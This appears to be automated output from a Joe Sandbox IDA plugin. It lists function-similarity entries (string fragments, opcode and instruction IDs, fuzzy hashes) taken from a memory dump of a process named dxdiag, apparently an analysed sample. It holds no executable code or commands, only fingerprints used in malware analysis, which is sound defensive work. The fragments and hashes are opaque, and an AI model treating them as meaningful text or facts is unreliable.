                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $Q$,.-($. &.$?c:7$QVTH$]VWC$qAB_
                                                                                                      • API String ID: 0-2163668455
                                                                                                      • Opcode ID: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
                                                                                                      • Instruction ID: d19ded286c5482f05c95a3e280dd030e35027ba8af5a7be08d79747085adfcff
                                                                                                      • Opcode Fuzzy Hash: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
                                                                                                      • Instruction Fuzzy Hash: 99B179717083A18BD724CB34A4412EBB7D1DFD6300F948A2FD9998B382E338D905D79A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: jPl$%R6T$%V6h$1F&X$=N?@$|Z7\
                                                                                                      • API String ID: 0-720933595
                                                                                                      • Opcode ID: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
                                                                                                      • Instruction ID: f39d86c070ab500bf256f0a98519923189adf886995b2a16e0c98b1acc46fafb
                                                                                                      • Opcode Fuzzy Hash: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
                                                                                                      • Instruction Fuzzy Hash: F4227A75A04255CFDB04CF68E8817AEBBB2FF4A310F68416DE441AB392DB399D01CB58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2l$G$a+ab$gdk|$oscd$|ed
                                                                                                      • API String ID: 0-3137366845
                                                                                                      • Opcode ID: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
                                                                                                      • Instruction ID: 2b51620a84509c9e7f89b2250eaa4d1d77fcbe22bbd39bf4a7e45a94f0a53178
                                                                                                      • Opcode Fuzzy Hash: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
                                                                                                      • Instruction Fuzzy Hash: 76415872A483904BD318CF69C89239BBFE2EB96304F04496DF5C597381D7BAC9058B86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: nB$"$2lB$2pB$bpB
                                                                                                      • API String ID: 0-1940457101
                                                                                                      • Opcode ID: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
                                                                                                      • Instruction ID: 558fbc4cb8a2958d1f7e7249d7ccc9316d198c96dd93b6a73ccfed5fe5d12803
                                                                                                      • Opcode Fuzzy Hash: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
                                                                                                      • Instruction Fuzzy Hash: 6B020375608351CFD714DF28D88032AFBE2BF9A320F198A6DE4A5873E1E778D9058B45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,Y$V,$Z[$^E$pqr
                                                                                                      • API String ID: 0-279934592
                                                                                                      • Opcode ID: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
                                                                                                      • Instruction ID: 5742babc61ebacdb7949157f0bd4e01d84a0f7fb4511d1348a61e7c30121f0f1
                                                                                                      • Opcode Fuzzy Hash: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
                                                                                                      • Instruction Fuzzy Hash: E2D10FB4608341DFE724CF20E881B6FBBA0FB86704F94892DE68597391D778D905CB4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &'$53/L$976E25EBFC839FDD5EC6468C5C963249$rt
                                                                                                      • API String ID: 0-1304976474
                                                                                                      • Opcode ID: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
                                                                                                      • Instruction ID: c43cc0f4767f0386331e86a65d878f221811e9f74dfb90e72f7e2679060c6ec5
                                                                                                      • Opcode Fuzzy Hash: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
                                                                                                      • Instruction Fuzzy Hash: 19A100B050C3808BD314DF358890A6FBBE4EF92314F14496DE1E69B3A2D738D90ACB56
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: KT$LM$OM$stu
                                                                                                      • API String ID: 0-2300950273
                                                                                                      • Opcode ID: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
                                                                                                      • Instruction ID: e0790f8a2260445ed915882484265c43d046fe5b7e2851accbdc848ea5d765e3
                                                                                                      • Opcode Fuzzy Hash: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
                                                                                                      • Instruction Fuzzy Hash: 37A1BC7660C3449BD704EF26D8914AFBBF6EB96310F444C2DF4D687342D6398A098B9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .tv$D$KL$`
                                                                                                      • API String ID: 0-1798403091
                                                                                                      • Opcode ID: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
                                                                                                      • Instruction ID: 3f30fe60f5f3189d76d806e3d19590f01995e251e5eb8f492cdef6a97151cc10
                                                                                                      • Opcode Fuzzy Hash: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
                                                                                                      • Instruction Fuzzy Hash: 4291ABB04083918BE334CF24C4A57ABBBE1FF86314F158A5DD4C94B392D7798885CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #'!7$2-:.$<r/+
                                                                                                      • API String ID: 0-1588113804
                                                                                                      • Opcode ID: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
                                                                                                      • Instruction ID: f9fba50b878ae6ca9efe469270682ac7877d2de3c9241f307d5b60eb0439a20b
                                                                                                      • Opcode Fuzzy Hash: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
                                                                                                      • Instruction Fuzzy Hash: 14322276A08212CFD318CF28DC9166AB3E2FF89314F49853DE99597390D7B8D901CB85
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 9$9$yz
                                                                                                      • API String ID: 0-3458379945
                                                                                                      • Opcode ID: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
                                                                                                      • Instruction ID: 8cb2bd10700cf6573130ed67dfada133875a43ff1573faf34ad6f8871ffd4bd0
                                                                                                      • Opcode Fuzzy Hash: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
                                                                                                      • Instruction Fuzzy Hash: C2C130B6A0C3118BC714DF68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 9$9$yz
                                                                                                      • API String ID: 0-3458379945
                                                                                                      • Opcode ID: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
                                                                                                      • Instruction ID: bbb38220efc2b624f5925e2889de6455b8c212916dff37784df4ba08f5a7ac67
                                                                                                      • Opcode Fuzzy Hash: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
                                                                                                      • Instruction Fuzzy Hash: ABC120B660C3118BC7249F68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &'$:$x#X%
                                                                                                      • API String ID: 0-3823454105
                                                                                                      • Opcode ID: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
                                                                                                      • Instruction ID: 8f3827cfcbc4e38f67a50f9a1e96b6c0906f4e5a80d62fafde117fdb12ab2f56
                                                                                                      • Opcode Fuzzy Hash: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
                                                                                                      • Instruction Fuzzy Hash: A4D1277A618652CBCB185F24E86237B73E1FF4A745F0B807ED482872A1EB798950CB45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: OG$pYA$pw
                                                                                                      • API String ID: 0-4264688152
                                                                                                      • Opcode ID: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
                                                                                                      • Instruction ID: 4159aafd9c10dcdb92f5b7ab8577220b838cb96e890b31dd2f5e1bbf81f70fed
                                                                                                      • Opcode Fuzzy Hash: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
                                                                                                      • Instruction Fuzzy Hash: 3DC12374548341CBD7349F24D891BEB73A1EF96314F044A3DE4D98B3A1EB389981CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X\j_$d$ztbk
                                                                                                      • API String ID: 0-161409437
                                                                                                      • Opcode ID: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
                                                                                                      • Instruction ID: c647836b6919da90344013ba879caa2c0c0a118e64d05fdf5bbca9858e4c4854
                                                                                                      • Opcode Fuzzy Hash: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
                                                                                                      • Instruction Fuzzy Hash: 7DB146712047918FD329CF29C450723FBE2AF86300F69C69EC8D68B796C678E802CB55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X\j_$d$ztbk
                                                                                                      • API String ID: 0-161409437
                                                                                                      • Opcode ID: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
                                                                                                      • Instruction ID: 63ec9625d8e1e38da1926b311d6272fb904936b9087af233feddb224084f3342
                                                                                                      • Opcode Fuzzy Hash: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
                                                                                                      • Instruction Fuzzy Hash: A9A158712047918FD329CF29C450722FBE2AF86304F69C69EC9D68B792C778D812CB55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X\j_$d$ztbk
                                                                                                      • API String ID: 0-161409437
                                                                                                      • Opcode ID: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
                                                                                                      • Instruction ID: 69c4823cc23e329729b65d6cd6aa0dd4aae8d762435b1c1a1192b9f4453f2a0f
                                                                                                      • Opcode Fuzzy Hash: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
                                                                                                      • Instruction Fuzzy Hash: D6A148712047918FD329CF29C490722FBE2AF86304F69C69EC9D68B792C779D842CB55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X\j_$d$ztbk
                                                                                                      • API String ID: 0-161409437
                                                                                                      • Opcode ID: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
                                                                                                      • Instruction ID: b77578477651018fdeaac84c335eda1cf7dbe90ebbcab35e646ae95f6ad1400d
                                                                                                      • Opcode Fuzzy Hash: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
                                                                                                      • Instruction Fuzzy Hash: 17A168712047918FD325CF29C490722FBE2AF96300F6D869EC4D68B786C778D802CB65
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3zx[$qzx[$@B
                                                                                                      • API String ID: 0-149612330
                                                                                                      • Opcode ID: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
                                                                                                      • Instruction ID: 9e4b87dcb06e457d0f9d11912b9a92467ef5426d1500ae2c30e3006a4d20d98e
                                                                                                      • Opcode Fuzzy Hash: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
                                                                                                      • Instruction Fuzzy Hash: 9AA14471A043509FE724CF68CD41BAEBBB1FB85700F0541AEE905AF392D7759902CB95
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: )LWt$VwWy$su
                                                                                                      • API String ID: 0-3217031312
                                                                                                      • Opcode ID: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
                                                                                                      • Instruction ID: 30f66bfa02c826f192fa745d1aa3d8111df13ee3ec6becbcaa5c5be03c67a3cc
                                                                                                      • Opcode Fuzzy Hash: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
                                                                                                      • Instruction Fuzzy Hash: 44510FB0201711ABD3248F21C495722BBB1BB19308F24969CD1861FB96D3BBE457CF88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4l$KA
                                                                                                      • API String ID: 0-2227922710
                                                                                                      • Opcode ID: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
                                                                                                      • Instruction ID: 7d394960c13b993b07ff0ec63b5c916a70d7b749b6eef6e0c3313fbac85af60e
                                                                                                      • Opcode Fuzzy Hash: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
                                                                                                      • Instruction Fuzzy Hash: 55421475608301CBE714DF24DC42ABB73A1FBC6314F19853EE58587391E7799885CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0$8
                                                                                                      • API String ID: 0-46163386
                                                                                                      • Opcode ID: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
                                                                                                      • Instruction ID: 6370abf147319fefda308a2038e70a02aa4510a212c48b2156ced0c66922abe4
                                                                                                      • Opcode Fuzzy Hash: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
                                                                                                      • Instruction Fuzzy Hash: A27224B16083419FD710CF18C880B9BBBE1AF94354F04892EF9999B392D379D958CF96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: f$g
                                                                                                      • API String ID: 2994545307-2729975458
                                                                                                      • Opcode ID: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
                                                                                                      • Instruction ID: c9b2282577dd7928e87c6e7aed450861025ac80ca66e243a85fcddc34fbf70c2
                                                                                                      • Opcode Fuzzy Hash: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
                                                                                                      • Instruction Fuzzy Hash: 1F3204756083419FD714CF28C880A2FBBE2ABC9314F299A2EE5D597391CB75DC41CB4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$W
                                                                                                      • API String ID: 0-3485357538
                                                                                                      • Opcode ID: 6a21d55a5fbcc48de4ab3196158e1f9afa0471f8b48752441063c17706421383
                                                                                                      • Instruction ID: 7f43de0d9f64e876bdb76b0051892af2d1d95dcac743c0c21e269c463886ecd5
                                                                                                      • Opcode Fuzzy Hash: 6a21d55a5fbcc48de4ab3196158e1f9afa0471f8b48752441063c17706421383
                                                                                                      • Instruction Fuzzy Hash: C4322571A083518BD324CF28C8907ABBBE1FFCA314F198A6EE4C597351DB789941CB56
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dZB$r`B
                                                                                                      • API String ID: 0-3904460924
                                                                                                      • Opcode ID: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
                                                                                                      • Instruction ID: cf11a58a00d61d500a6140a78dc3910c7a963cd34266b10506d1b50124c2a4e1
                                                                                                      • Opcode Fuzzy Hash: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
                                                                                                      • Instruction Fuzzy Hash: D11245B460C3918BD710CF25E89126FBBE0EF96308F54896DE4C69B382D778D905CB5A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ofA$
                                                                                                      • API String ID: 0-1552613143
                                                                                                      • Opcode ID: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
                                                                                                      • Instruction ID: 2c823ed54a2d2150a2d94358e89aa5dd56cf77a80caffb394fd748b267586704
                                                                                                      • Opcode Fuzzy Hash: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
                                                                                                      • Instruction Fuzzy Hash: E51237756083509FD724CF28DC917AF77E2EB86314F154A3DE48A87291DB39D841CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: R9B$}~
                                                                                                      • API String ID: 0-2143352738
                                                                                                      • Opcode ID: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
                                                                                                      • Instruction ID: c67b400d593570aea51a5883cfaab9404424982819ae66ceb36794941c5778d7
                                                                                                      • Opcode Fuzzy Hash: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
                                                                                                      • Instruction Fuzzy Hash: BEF12276A18321DBC724DF24D8411ABB3F2FF85742F88896DE48597260E73C9B45CB49
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N%&'$ij
                                                                                                      • API String ID: 0-2336341608
                                                                                                      • Opcode ID: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
                                                                                                      • Instruction ID: 3ec1164c08b8df8f5ad239da4b50aaa16cb908530bffe58995966572d7d06e5a
                                                                                                      • Opcode Fuzzy Hash: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
                                                                                                      • Instruction Fuzzy Hash: 63913375A483008BC714CF69CC913ABB7E2EFD9314F08C96DE8C68B385E7789585875A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: )$IEND
                                                                                                      • API String ID: 0-707183367
                                                                                                      • Opcode ID: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
                                                                                                      • Instruction ID: 69784f994d522c806696069fb0bc0fba4b22834945d23ce78d0c5b6699577816
                                                                                                      • Opcode Fuzzy Hash: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
                                                                                                      • Instruction Fuzzy Hash: F2D191B19083449FD710CF15D841B5FBBE4AB94308F14492EFA99AB3C2D779E908CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ./$h3T5
                                                                                                      • API String ID: 0-2425256910
                                                                                                      • Opcode ID: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
                                                                                                      • Instruction ID: 8875d4901756c4b216268357a0ac996a12432350b8b0083aa304c3f513ba26e0
                                                                                                      • Opcode Fuzzy Hash: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
                                                                                                      • Instruction Fuzzy Hash: EA7114B651C3409AC718DF24CC9117BB7B2EFD5304F19962DE89567391EB38860AC78D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: +
                                                                                                      • API String ID: 2994545307-2126386893
                                                                                                      • Opcode ID: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
                                                                                                      • Instruction ID: 1a842e94016ed2d8c532f852bc49d7d4a1e2a2dd1db2aad469a581af37c970af
                                                                                                      • Opcode Fuzzy Hash: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
                                                                                                      • Instruction Fuzzy Hash: C9924EB1604B408FD324DF38C5953ABBBE2AB95314F18893ED4EB873C2DA78A545C746
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: "
                                                                                                      • API String ID: 2994545307-123907689
                                                                                                      • Opcode ID: 9c24db7ea9b62738beb93c1e0c77958b4322bda01f0c3960b2e70158945ec4ff
                                                                                                      • Instruction ID: 17df69645741845f95c7c20def89238328e3832f630206f777091f64e93cc147
                                                                                                      • Opcode Fuzzy Hash: 9c24db7ea9b62738beb93c1e0c77958b4322bda01f0c3960b2e70158945ec4ff
                                                                                                      • Instruction Fuzzy Hash: 73224B746083408BD7258F28D8506BFB7E2FB96314F285A2DE4D157392DB38D842CB9E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
